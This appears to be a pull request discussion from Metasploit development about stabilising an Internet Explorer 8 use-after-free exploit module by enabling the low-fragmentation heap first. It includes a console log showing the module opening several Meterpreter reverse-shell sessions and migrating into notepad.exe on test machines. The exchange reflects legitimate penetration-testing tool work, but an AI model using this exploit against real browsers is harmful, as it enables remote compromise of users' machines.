Modifies the exploit a little for better stability

[wchen-r7]

Without this patch, it looks like the 1st attempt tends to fail first, but then IE recovers from the crash, and then that's how we get a shell.

This patch makes sure the LFH is enabled before the CGenericElement object is created. Trigger is also modified a little. Seems better.

Tested on XP SP3 + IE 8 and Win 7 + IE8

[jvazquez-r7]

Working well on W7:

msf exploit(ie_cgenericelement_uaf) > rexploit
[*] Stopping existing job...
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 10.6.0.165:4444 
[*] Using URL: http://0.0.0.0:8080/83DEnFa1gimQTr4
[*]  Local IP: http://10.6.0.165:8080/83DEnFa1gimQTr4
[*] Server started.
msf exploit(ie_cgenericelement_uaf) > [*] 10.6.0.165       ie_cgenericelement_uaf - Requesting: /83DEnFa1gimQTr4
[*] 10.6.0.165       ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 10.6.0.165       ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:52911) at 2013-06-03 15:32:38 -0500
[*] Session ID 1 (10.6.0.165:4444 -> 10.6.0.165:52911) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (580)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3148
[+] Successfully migrated to process 
[*] 192.168.172.196 - Meterpreter session 1 closed.  Reason: Died
[*] 10.6.0.165       ie_cgenericelement_uaf - Requesting: /83DEnFa1gimQTr4
[*] 10.6.0.165       ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 10.6.0.165       ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 2 opened (10.6.0.165:4444 -> 10.6.0.165:52925) at 2013-06-03 15:33:02 -0500
[*] Session ID 2 (10.6.0.165:4444 -> 10.6.0.165:52925) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2588)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 744
[+] Successfully migrated to process 
[*] 192.168.172.196 - Meterpreter session 2 closed.  Reason: Died
[*] 10.6.0.165       ie_cgenericelement_uaf - Requesting: /83DEnFa1gimQTr4
[*] 10.6.0.165       ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 10.6.0.165       ie_cgenericelement_uaf - Sending HTML...
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 3 opened (10.6.0.165:4444 -> 10.6.0.165:52940) at 2013-06-03 15:33:23 -0500
[*] Session ID 3 (10.6.0.165:4444 -> 10.6.0.165:52940) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2516)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2072
[+] Successfully migrated to process 

The only retry was not due to the trigger but probably to the heap busted, which is not frequent, just something we have to deal with when working with heap exploits :)